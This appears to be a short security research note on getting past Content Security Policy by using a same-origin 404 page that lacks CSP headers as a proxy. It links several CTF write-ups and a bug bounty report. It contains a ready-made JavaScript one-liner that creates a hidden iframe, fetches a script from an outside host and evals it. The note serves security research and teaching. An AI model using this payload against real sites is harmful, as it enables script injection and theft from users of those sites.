### Walarm 404 Page Proxy CSP Bypass Script This article by Walarm is legendary for bypassing CSP. There are times when you have JS execution (perhaps via `unsafe-eval`), but you can't load your script from a remote server due to `default-src` rules. Walarm released a great technique back when CSP had just came out on how to bypass this by using a 404 page as a proxy, because 404 pages often lack CSP headers. Here is that article: [Neatly bypassing CSP ✔️](https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa/ "https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa/") Here is a script you can use to easily execute JS in your target environment via the 404 page proxy: `s='//poc.rhynorater.com/alert.js';p='/404';d=document;j=d.createElement("iframe");j.style="display:none";j.src=p;d.body.append(j);j.contentWindow.fetch(s).then(t=>t.text()).then(eval)` Where `s` is your `script` that you want to import and `p` is the page that is lacking CSP headers (but is same-origin). ![](/home/cartoon/.config/marktext/images/2024-09-05-10-38-32-image.png) terjanq mentioned a very interesting variation to this technique in this writeup (also a very interesting regex bypass) basicly he just loaded a page with a hugely long path to get the server to error out before setting any security headers [google-ctf/2023/quals/web-postviewer2/solution/README.md at main · google/google-ctf · GitHub](https://github.com/google/google-ctf/blob/main/2023/quals/web-postviewer2/solution/README.md "https://github.com/google/google-ctf/blob/main/2023/quals/web-postviewer2/solution/README.md") If you want another example: https://huntr.com/bounties/4c1c5db5-210f-4d7e-8380-b95f88fdb78d :p remember seeing something similar in Sekai CTF 2023 IIRC where you would abuse the fact that the 404 pages dont have a CSP [SekaiCTF 2023 - Leakless Note | Kalmarunionen](https://www.kalmarunionen.dk/writeups/2023/sekai/leakless-notes/ "https://www.kalmarunionen.dk/writeups/2023/sekai/leakless-notes/")